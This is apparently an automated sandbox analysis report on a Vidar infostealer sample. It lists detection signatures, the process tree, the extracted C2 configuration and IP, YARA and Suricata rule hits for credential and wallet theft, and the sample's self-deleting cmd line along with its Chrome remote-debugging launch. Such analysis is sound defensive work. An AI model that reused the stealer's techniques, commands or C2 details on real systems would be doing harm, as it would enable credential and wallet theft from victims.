Windows Analysis Report
SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
Analysis ID: 1610535
MD5: d41aed28538e53598c5ee0b61a7474fb
SHA1: 29a1d2fda339625e15739e193fffafe3a636f8b9
SHA256: 03f111a7553d3e698a07aea301f9be5d29bcde70513a1323283db3e2e4045d95
Tags: exe, Vidar, user-SecuriteInfoCom

Detection

Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe" MD5: D41AED28538E53598C5EE0B61A7474FB)
    • BitLockerToGo.exe (PID: 3704 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 5796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2288,i,14542950946606832466,4016932128899336426,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 8084 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8140 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
    Source | Rule | Description | Author | Strings
    00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
      00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
        00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth
        • 0x0:$x1: 4d5a9000030000000
        00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
          00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
          • 0x1ad7f:$str01: MachineID:
          • 0x19d4f:$str02: Work Dir: In memory
          • 0x1ae27:$str03: [Hardware]
          • 0x1ad68:$str04: VideoCard:
          • 0x1a4c0:$str05: [Processes]
          • 0x1a4cc:$str06: [Software]
          • 0x19de0:$str07: information.txt
          • 0x1aabc:$str08: %s\*
          • 0x1ab09:$str08: %s\*
          • 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1a392:$str12: UseMasterPassword
          • 0x1ae33:$str13: Soft: WinSCP
          • 0x1a86b:$str14: <Pass encoding="base64">
          • 0x1ae16:$str15: Soft: FileZilla
          • 0x19dd2:$str16: passwords.txt
          • 0x1a3bd:$str17: build_id
          • 0x1a484:$str18: file_data
          Source | Rule | Description | Author | Strings
          4.2.BitLockerToGo.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
            0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
            • 0x1917f:$str01: MachineID:
            • 0x19227:$str03: [Hardware]
            • 0x19168:$str04: VideoCard:
            • 0x188c0:$str05: [Processes]
            • 0x188cc:$str06: [Software]
            • 0x18ebc:$str08: %s\*
            • 0x18f09:$str08: %s\*
            • 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x18792:$str12: UseMasterPassword
            • 0x19233:$str13: Soft: WinSCP
            • 0x18c6b:$str14: <Pass encoding="base64">
            • 0x19216:$str15: Soft: FileZilla
            • 0x187bd:$str17: build_id
            • 0x18884:$str18: file_data
            4.2.BitLockerToGo.exe.400000.0.raw.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
            • 0x1ad7f:$str01: MachineID:
            • 0x19d4f:$str02: Work Dir: In memory
            • 0x1ae27:$str03: [Hardware]
            • 0x1ad68:$str04: VideoCard:
            • 0x1a4c0:$str05: [Processes]
            • 0x1a4cc:$str06: [Software]
            • 0x19de0:$str07: information.txt
            • 0x1aabc:$str08: %s\*
            • 0x1ab09:$str08: %s\*
            • 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x1a392:$str12: UseMasterPassword
            • 0x1ae33:$str13: Soft: WinSCP
            • 0x1a86b:$str14: <Pass encoding="base64">
            • 0x1ae16:$str15: Soft: FileZilla
            • 0x19dd2:$str16: passwords.txt
            • 0x1a3bd:$str17: build_id
            • 0x1a484:$str18: file_data
            0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
            • 0x1917f:$str01: MachineID:
            • 0x19227:$str03: [Hardware]
            • 0x19168:$str04: VideoCard:
            • 0x188c0:$str05: [Processes]
            • 0x188cc:$str06: [Software]
            • 0x18ebc:$str08: %s\*
            • 0x18f09:$str08: %s\*
            • 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x18792:$str12: UseMasterPassword
            • 0x19233:$str13: Soft: WinSCP
            • 0x18c6b:$str14: <Pass encoding="base64">
            • 0x19216:$str15: Soft: FileZilla
            • 0x187bd:$str17: build_id
            • 0x18884:$str18: file_data
            4.2.BitLockerToGo.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

              System Summary

              Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3704, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5796, ProcessName: chrome.exe


              AV Detection

              Source: https://safewat.pro/ | Avira URL Cloud: Label: malware
              Source: https://safewat.pro/5 | Avira URL Cloud: Label: malware
              Source: 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe | ReversingLabs: Detection: 39%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe | Virustotal: Detection: 45%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00405FE7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,4_2_0040E7E9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey,4_2_00406062
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040627F LocalAlloc,BCryptDecrypt,4_2_0040627F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,4_2_0040609C
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:56311 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: chrome.exe | Memory has grown: Private usage: 1MB later: 40MB

              Networking

              Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49740 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49739 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49744 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49743 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56057 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56057 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56059 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56059 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.215.154:443 -> 192.168.2.4:49742
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56058 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56058 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56060 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56065 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56065 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56063 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56063 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56076 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56076 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56062 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56062 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56056 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56089 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56089 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56061 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:56061 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.215.154:443 -> 192.168.2.4:49741
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56212 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56234 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56226 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56219 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56242 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56256 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56263 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56294 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56286 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56248 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56267 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56301 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56311 -> 5.75.215.154:443
              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56202 -> 5.75.215.154:443
